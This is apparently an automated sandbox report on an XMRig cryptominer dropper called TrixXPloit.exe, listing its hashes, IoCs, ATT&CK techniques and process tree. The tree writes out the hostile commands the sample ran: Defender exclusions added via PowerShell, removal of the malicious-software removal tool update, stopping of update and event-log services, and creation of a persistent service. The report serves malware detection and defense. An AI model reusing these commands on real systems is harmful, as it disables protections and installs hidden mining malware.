xmrig | 73b609e62a885cb34e16ae24652643374938b63fb909ff520ef3abab1acef8c6

Analysis

max time kernel
137s
max time network
132s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
13/02/2024, 12:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TrixXPloit.exe
Size

2.7MB
MD5

115cd2af99e0164e38a30e31f4868f22
SHA1

3bb156889b2c85eef03f601c53c9e3f639b776a9
SHA256

c880c4b1702d093d6e9bbeb772da0459da2387db9b7b13e95620996e5773db83
SHA512

9a609f90eeda49480873e4fab59b6edeaa0ee9c82569ee03d7cb69d968058201cdcaf490418b549b1d16332ed4db0a26fcd61a99c3296fbb3de4c76b10686151
SSDEEP

49152:QX6ms1+CBy/+PK+ShRDw+I/SfZlNKfaBT0YA3jgpXSHXRVlCmb5BW:pmssgrPKJfF3wns6XRV8mbH

Score

10^/10

xmrig evasion miner persistence upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral6/memory/3412-70-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/3412-71-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/3412-74-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/3412-75-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/3412-73-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/3412-76-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/3412-77-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/3412-79-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral6/memory/3412-80-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	TrixXPloit.exe
File created	C:\Windows\system32\drivers\etc\hosts	Recover.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 1 IoCs

pid	Process
3520	Recover.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral6/memory/3412-65-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/3412-66-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/3412-67-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/3412-68-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/3412-69-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/3412-70-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/3412-71-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/3412-74-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/3412-75-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/3412-73-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/3412-76-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/3412-77-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/3412-79-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral6/memory/3412-80-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Recover.exe
File opened for modification	C:\Windows\system32\MRT.exe	TrixXPloit.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3520 set thread context of 2960	3520	Recover.exe	140
PID 3520 set thread context of 3412	3520	Recover.exe	145

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1372	sc.exe
3580	sc.exe
4828	sc.exe
1048	sc.exe
4932	sc.exe
4732	sc.exe
332	sc.exe
3752	sc.exe
3336	sc.exe
2460	sc.exe
5032	sc.exe
868	sc.exe
3208	sc.exe
3288	sc.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2712	TrixXPloit.exe
4608	powershell.exe
4608	powershell.exe
2712	TrixXPloit.exe
2712	TrixXPloit.exe
2712	TrixXPloit.exe
2712	TrixXPloit.exe
2712	TrixXPloit.exe
2712	TrixXPloit.exe
2712	TrixXPloit.exe
2712	TrixXPloit.exe
2712	TrixXPloit.exe
2712	TrixXPloit.exe
2712	TrixXPloit.exe
2712	TrixXPloit.exe
2712	TrixXPloit.exe
2712	TrixXPloit.exe
3520	Recover.exe
4896	powershell.exe
4896	powershell.exe
3520	Recover.exe
3520	Recover.exe
3520	Recover.exe
3520	Recover.exe
3520	Recover.exe
3520	Recover.exe
3520	Recover.exe
3520	Recover.exe
3520	Recover.exe
3520	Recover.exe
3520	Recover.exe
3520	Recover.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe
3412	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
676	Process not Found

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	2712	TrixXPloit.exe
Token: SeShutdownPrivilege	672	powercfg.exe
Token: SeCreatePagefilePrivilege	672	powercfg.exe
Token: SeShutdownPrivilege	3328	powercfg.exe
Token: SeCreatePagefilePrivilege	3328	powercfg.exe
Token: SeShutdownPrivilege	5012	powercfg.exe
Token: SeCreatePagefilePrivilege	5012	powercfg.exe
Token: SeShutdownPrivilege	1144	powercfg.exe
Token: SeCreatePagefilePrivilege	1144	powercfg.exe
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeDebugPrivilege	3520	Recover.exe
Token: SeShutdownPrivilege	964	powercfg.exe
Token: SeCreatePagefilePrivilege	964	powercfg.exe
Token: SeShutdownPrivilege	896	powercfg.exe
Token: SeCreatePagefilePrivilege	896	powercfg.exe
Token: SeShutdownPrivilege	4492	powercfg.exe
Token: SeCreatePagefilePrivilege	4492	powercfg.exe
Token: SeShutdownPrivilege	4284	powercfg.exe
Token: SeCreatePagefilePrivilege	4284	powercfg.exe
Token: SeLockMemoryPrivilege	3412	explorer.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2824 wrote to memory of 4392	2824	cmd.exe	96
PID 2824 wrote to memory of 4392	2824	cmd.exe	96
PID 3940 wrote to memory of 4292	3940	cmd.exe	127
PID 3940 wrote to memory of 4292	3940	cmd.exe	127
PID 3520 wrote to memory of 2960	3520	Recover.exe	140
PID 3520 wrote to memory of 2960	3520	Recover.exe	140
PID 3520 wrote to memory of 2960	3520	Recover.exe	140
PID 3520 wrote to memory of 2960	3520	Recover.exe	140
PID 3520 wrote to memory of 2960	3520	Recover.exe	140
PID 3520 wrote to memory of 2960	3520	Recover.exe	140
PID 3520 wrote to memory of 2960	3520	Recover.exe	140
PID 3520 wrote to memory of 2960	3520	Recover.exe	140
PID 3520 wrote to memory of 2960	3520	Recover.exe	140
PID 3520 wrote to memory of 3412	3520	Recover.exe	145
PID 3520 wrote to memory of 3412	3520	Recover.exe	145
PID 3520 wrote to memory of 3412	3520	Recover.exe	145
PID 3520 wrote to memory of 3412	3520	Recover.exe	145
PID 3520 wrote to memory of 3412	3520	Recover.exe	145

C:\Users\Admin\AppData\Local\Temp\TrixXPloit.exe
"C:\Users\Admin\AppData\Local\Temp\TrixXPloit.exe"
1⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4392
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4932
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4732
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2460
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:5032
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1372
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3328
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe delete "SmartWindows"
  2⤵
  - Launches sc.exe
  PID:4828
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1144
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:672
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5012
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe create "SmartWindows" binpath= "C:\ProgramData\Common\Recover.exe" start= "auto"
  2⤵
  - Launches sc.exe
  PID:332
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop eventlog
  2⤵
  - Launches sc.exe
  PID:3208
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe start "SmartWindows"
  2⤵
  - Launches sc.exe
  PID:3288

C:\ProgramData\Common\Recover.exe
C:\ProgramData\Common\Recover.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3520
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4896
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3940
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4292
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3336
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1048
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:868
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3580
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4284
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:896
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4492
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:964
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2960
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Common\Recover.exe

Filesize
1.6MB

MD5
6b052ef100080d412ff7c029a741537e

SHA1
6813b1d2bc8ee9b4f531f86d15d6b020f9a0ac38

SHA256
f80b3bebad05fe63d745f2b180c6c0c29cd7de89b4cf12815025d02315141ee2

SHA512
7800e3e202131af0cd34501223d1adaa2706cc513fd9254fd516134dd5682a2d4683dab9421bc1431cca49f9bae3d68eaf3147779c75f76b12b4cad80983e35f

Download Submit
C:\ProgramData\Common\Recover.exe

Filesize
2.7MB

MD5
115cd2af99e0164e38a30e31f4868f22

SHA1
3bb156889b2c85eef03f601c53c9e3f639b776a9

SHA256
c880c4b1702d093d6e9bbeb772da0459da2387db9b7b13e95620996e5773db83

SHA512
9a609f90eeda49480873e4fab59b6edeaa0ee9c82569ee03d7cb69d968058201cdcaf490418b549b1d16332ed4db0a26fcd61a99c3296fbb3de4c76b10686151

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sqhdefxw.asd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
2d29fd3ae57f422e2b2121141dc82253

SHA1
c2464c857779c0ab4f5e766f5028fcc651a6c6b7

SHA256
80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4

SHA512
077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

Download Submit
memory/2960-57-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2960-63-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2960-61-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2960-60-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2960-59-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/2960-58-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/3412-71-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3412-65-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3412-82-0x0000000001F70000-0x0000000001F90000-memory.dmp

Filesize
128KB

Download
memory/3412-81-0x0000000001F70000-0x0000000001F90000-memory.dmp

Filesize
128KB

Download
memory/3412-80-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3412-79-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3412-78-0x0000000001E30000-0x0000000001E70000-memory.dmp

Filesize
256KB

Download
memory/3412-77-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3412-76-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3412-73-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3412-75-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3412-74-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3412-72-0x0000000001430000-0x0000000001450000-memory.dmp

Filesize
128KB

Download
memory/3412-70-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3412-69-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3412-68-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3412-67-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3412-66-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/4608-10-0x00007FFCCA9E0000-0x00007FFCCB4A1000-memory.dmp

Filesize
10.8MB

Download
memory/4608-9-0x000002299D650000-0x000002299D672000-memory.dmp

Filesize
136KB

Download
memory/4608-11-0x0000022983050000-0x0000022983060000-memory.dmp

Filesize
64KB

Download
memory/4608-12-0x0000022983050000-0x0000022983060000-memory.dmp

Filesize
64KB

Download
memory/4608-15-0x00007FFCCA9E0000-0x00007FFCCB4A1000-memory.dmp

Filesize
10.8MB

Download
memory/4896-54-0x00007FFCCA9E0000-0x00007FFCCB4A1000-memory.dmp

Filesize
10.8MB

Download
memory/4896-49-0x000002539E190000-0x000002539E196000-memory.dmp

Filesize
24KB

Download
memory/4896-30-0x000002539BB00000-0x000002539BB10000-memory.dmp

Filesize
64KB

Download
memory/4896-29-0x00007FFCCA9E0000-0x00007FFCCB4A1000-memory.dmp

Filesize
10.8MB

Download
memory/4896-32-0x00007FF4C7240000-0x00007FF4C7250000-memory.dmp

Filesize
64KB

Download
memory/4896-51-0x000002539BB00000-0x000002539BB10000-memory.dmp

Filesize
64KB

Download
memory/4896-50-0x000002539E1A0000-0x000002539E1AA000-memory.dmp

Filesize
40KB

Download
memory/4896-31-0x000002539BB00000-0x000002539BB10000-memory.dmp

Filesize
64KB

Download
memory/4896-48-0x000002539E160000-0x000002539E168000-memory.dmp

Filesize
32KB

Download
memory/4896-47-0x000002539E1B0000-0x000002539E1CA000-memory.dmp

Filesize
104KB

Download
memory/4896-46-0x000002539E150000-0x000002539E15A000-memory.dmp

Filesize
40KB

Download
memory/4896-45-0x000002539E170000-0x000002539E18C000-memory.dmp

Filesize
112KB

Download
memory/4896-44-0x000002539E000000-0x000002539E00A000-memory.dmp

Filesize
40KB

Download
memory/4896-43-0x000002539DF40000-0x000002539DFF5000-memory.dmp

Filesize
724KB

Download
memory/4896-42-0x000002539DF20000-0x000002539DF3C000-memory.dmp

Filesize
112KB

Download